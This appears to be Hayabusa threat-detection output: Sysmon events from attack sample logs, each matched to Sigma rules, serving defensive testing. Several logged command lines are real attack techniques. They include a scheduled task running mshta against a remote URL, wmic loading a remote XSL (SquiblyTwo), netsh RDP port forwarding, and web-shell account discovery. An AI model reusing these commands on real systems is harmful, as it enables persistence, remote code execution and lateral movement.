+2019-05-22 00:32:59.389 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49703 (IEWIN7..home) | Dst: 108.179.232.58:443 (gator4243.hostgator.com) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:59.769 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR ""mshta.exe https://hotelesms.com/Injection.txt"" /F | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt | LID: 0xc796 | PID: 3772 | PGUID: 365ABB72-1A2B-5CE4-0000-00102F502201",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:59.769 +09:00,IEWIN7,1,high,Exec | Evas,Windows Shell Spawning Suspicious Program,,../hayabusa-rules/sigma/process_creation/proc_creation_win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:59.769 +09:00,IEWIN7,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:59.809 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\MSOFFICE_ | Process: C:\Windows\system32\svchost.exe | PID: 856 | PGUID: 365ABB72-39CB-5CE3-0000-0010E0AC0000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:33:00.140 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49704 (IEWIN7..home) | Dst: 105.73.6.112:80 (aka112.inwitelecom.net) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:33:01.141 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49705 (IEWIN7..home) | Dst: 105.73.6.105:80 (aka105.inwitelecom.net) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 13:02:11.307 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:1600 CREDAT:275470 /prefetch:2 | LID: 0xf05d | PID: 2888 | PGUID: 365ABB72-C9C3-5CE4-0000-00101F422E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_driveby_cve-2018-15982_sysmon_1_10.evtx
+2019-05-22 13:02:11.307 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Program Files\Internet Explorer\iexplore.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3156 | Src PGUID: 365ABB72-C9C1-5CE4-0000-00100B222E00 | Tgt PID: 2888 | Tgt PGUID: 365ABB72-C9C3-5CE4-0000-00101F422E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_driveby_cve-2018-15982_sysmon_1_10.evtx
+2019-05-24 01:49:05.736 +09:00,IEWIN7,1,info,,Process Created,"Cmd: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf347 | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
+2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,Evas | Exec,SquiblyTwo,,../hayabusa-rules/sigma/process_creation/proc_creation_win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
+2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,Exec,Suspicious WMI Reconnaissance,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
+2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,Evas,XSL Script Processing,,../hayabusa-rules/sigma/process_creation/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
+2019-05-24 01:49:05.862 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\wbem\WMIC.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00 | Hash: SHA1=723644A78C703DF177235E820A906B9621B9B2FB,MD5=3CB096F266A52F65A571B2A3FC81D13E,SHA256=12D498F5310AD70818C7251B5D6AAF145CD7FA67887125645E245D856347BFAA,IMPHASH=EF7BEA73AB4F834F0C44DDE0150B5648",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
+2019-05-24 01:49:07.731 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\x50IGVBRfr55_test[1].xsl | Process: C:\Windows\System32\Wbem\WMIC.exe | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
+2019-05-24 01:49:07.731 +09:00,IEWIN7,11,high,,Windows Shell File Write to Suspicious Folder,,../hayabusa-rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
+2019-05-24 01:49:08.208 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49167 (IEWIN7..home) | Dst: 45.76.12.27:443 (45-76-12-27.static.afterburst.com) | User: IEWIN7\IEUser | Process: C:\Windows\System32\wbem\WMIC.exe | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
+2019-05-24 01:49:08.422 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl"" | LID: 0xf347 | PID: 4056 | PGUID: 365ABB72-CF04-5CE6-0000-001010F20C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
+2019-05-24 01:49:09.576 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49168 (IEWIN7..home) | Dst: 105.73.6.105:80 (aka105.inwitelecom.net) | User: IEWIN7\IEUser | Process: C:\Windows\System32\wbem\WMIC.exe | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
+2019-05-24 01:50:44.582 +09:00,IEWIN7,1,info,,Process Created,Cmd: wmiadap.exe /F /T /R | Process: C:\Windows\System32\wbem\WMIADAP.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 708 | PGUID: 365ABB72-CF64-5CE6-0000-0010CBD51100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
+2019-05-24 02:26:08.716 +09:00,IEWIN7,1,info,,Process Created,"Cmd: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat | Process: \\vboxsrv\HTools\msxsl.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0xf347 | PID: 3388 | PGUID: 365ABB72-D7B0-5CE6-0000-001077C56D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx
+2019-05-24 02:26:08.716 +09:00,IEWIN7,1,medium,Evas,XSL Script Processing,,../hayabusa-rules/sigma/process_creation/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx
+2019-05-24 02:26:08.947 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: \\vboxsrv\HTools\msxsl.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3388 | PGUID: 365ABB72-D7B0-5CE6-0000-001077C56D00 | Hash: SHA1=723644A78C703DF177235E820A906B9621B9B2FB,MD5=3CB096F266A52F65A571B2A3FC81D13E,SHA256=12D498F5310AD70818C7251B5D6AAF145CD7FA67887125645E245D856347BFAA,IMPHASH=EF7BEA73AB4F834F0C44DDE0150B5648",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx
+2019-05-24 02:26:09.437 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat | LID: 0xf347 | PID: 2240 | PGUID: 365ABB72-D7B1-5CE6-0000-00102CD76D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx
+2019-05-24 02:45:34.538 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xf347 | PID: 712 | PGUID: 365ABB72-DC3E-5CE6-0000-00102BC97200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx
+2019-05-24 02:46:04.671 +09:00,IEWIN7,1,info,,Process Created,"Cmd: netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5 | Process: C:\Windows\System32\netsh.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf347 | PID: 4088 | PGUID: 365ABB72-DC5C-5CE6-0000-001066E27200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx
+2019-05-24 02:46:04.671 +09:00,IEWIN7,1,medium,LatMov | Evas | C2,Netsh Port Forwarding,,../hayabusa-rules/sigma/process_creation/proc_creation_win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx
+2019-05-24 02:46:04.671 +09:00,IEWIN7,1,high,LatMov | Evas | C2,Netsh RDP Port Forwarding,,../hayabusa-rules/sigma/process_creation/proc_creation_win_netsh_port_fwd_3389.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx
+2019-05-24 10:33:53.112 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\windows\system32\cmd.exe"" /c net user | Process: C:\Windows\System32\cmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20 | LID: 0x9cf992 | PID: 2404 | PGUID: 365ABB72-4A01-5CE7-0000-0010EE9DAC00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-24 10:33:53.112 +09:00,IEWIN7,1,high,Persis,Shells Spawned by Web Servers,,../hayabusa-rules/sigma/process_creation/proc_creation_win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-24 10:33:53.122 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\windows\system32\inetsrv\w3wp.exe | Tgt Process: c:\windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2580 | Src PGUID: 365ABB72-49D6-5CE7-0000-001020A7A700 | Tgt PID: 2404 | Tgt PGUID: 365ABB72-4A01-5CE7-0000-0010EE9DAC00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-24 10:33:53.122 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-24 10:33:53.182 +09:00,IEWIN7,1,info,,Process Created,"Cmd: net user | Process: C:\Windows\System32\net.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""c:\windows\system32\cmd.exe"" /c net user | LID: 0x9cf992 | PID: 788 | PGUID: 365ABB72-4A01-5CE7-0000-00102DA1AC00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Disc | LatMov,Net.exe Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-24 10:33:53.192 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\net1 user | Process: C:\Windows\System32\net1.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: net user | LID: 0x9cf992 | PID: 712 | PGUID: 365ABB72-4A01-5CE7-0000-0010B6A2AC00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Disc | LatMov,Net.exe Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-25 00:38:21.485 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Defense Evasion - PowerShell ExecPolicy Changed | SetValue: HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell\ExecutionPolicy: Unrestricted | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3208 | PGUID: 365ABB72-0FAE-5CE8-0000-0010FE1E0800,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_powershell_execpolicy_changed_sysmon_13.evtx
+2019-05-26 13:01:42.385 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x12962 | PID: 3836 | PGUID: 365ABB72-0FA6-5CEA-0000-001049B50A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-26 13:01:42.385 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-26 13:01:42.545 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Evasion - Possible DLL Side Loading via jjs.exe | Image: C:\Users\IEUser\Desktop\info.rar\jli.dll | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3836 | PGUID: 365ABB72-0FA6-5CEA-0000-001049B50A00 | Hash: SHA1=E6F33CBE295026319CF9DB3CA665BC2BC9D978AC,MD5=CE150468126EAE5D99359DDE3197B6EA,SHA256=02B95EF7A33A87CC2B3B6FD47DB03E711045974E1ECF631D3BA9E076E1E374E9,IMPHASH=D386CCEF9C3130690E1183697F8E3ED9",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-26 13:01:42.966 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Evasion - Possible DLL Side Loading via jjs.exe | Image: C:\Users\IEUser\Desktop\info.rar\jli.dll | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3884 | PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00 | Hash: SHA1=E6F33CBE295026319CF9DB3CA665BC2BC9D978AC,MD5=CE150468126EAE5D99359DDE3197B6EA,SHA256=02B95EF7A33A87CC2B3B6FD47DB03E711045974E1ECF631D3BA9E076E1E374E9,IMPHASH=D386CCEF9C3130690E1183697F8E3ED9",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-26 13:01:42.966 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3884 | PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-26 13:01:42.966 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-26 13:01:43.567 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src PID: 3884 | Src PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00 | Tgt PID: 3908 | Tgt PGUID: 365ABB72-0FA7-5CEA-0000-001064C60A00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-26 13:01:43.567 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\svchost.exe | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" | LID: 0x3e7 | PID: 3908 | PGUID: 365ABB72-0FA7-5CEA-0000-001064C60A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-26 13:01:43.567 +09:00,IEWIN7,1,critical,Evas | PrivEsc,Suspect Svchost Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_svchost_no_cli.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-26 13:01:43.567 +09:00,IEWIN7,1,low,Evas,Windows Processes Suspicious Parent Directory,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-26 13:01:43.567 +09:00,IEWIN7,1,high,Evas,Suspicious Svchost Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-26 13:01:44.047 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | PID: 3836 | PGUID: 365ABB72-0FA6-5CEA-0000-001049B50A00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-26 13:01:44.598 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | PID: 3884 | PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-27 00:47:56.667 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\windows\system32\inetsrv\w3wp.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2744 | Src PGUID: 365ABB72-B26B-5CEA-0000-0010582A0800 | Tgt PID: 3388 | Tgt PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:56.667 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\System32\notepad.exe | Process: C:\Windows\System32\notepad.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipmb9da32d5-aa43-42fc-aeea-0cc226e10973 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20 | LID: 0x82423 | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:56.667 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:56.727 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\windows\system32\inetsrv\w3wp.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fff | Src PID: 2744 | Src PGUID: 365ABB72-B26B-5CEA-0000-0010582A0800 | Tgt PID: 3388 | Tgt PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:56.727 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
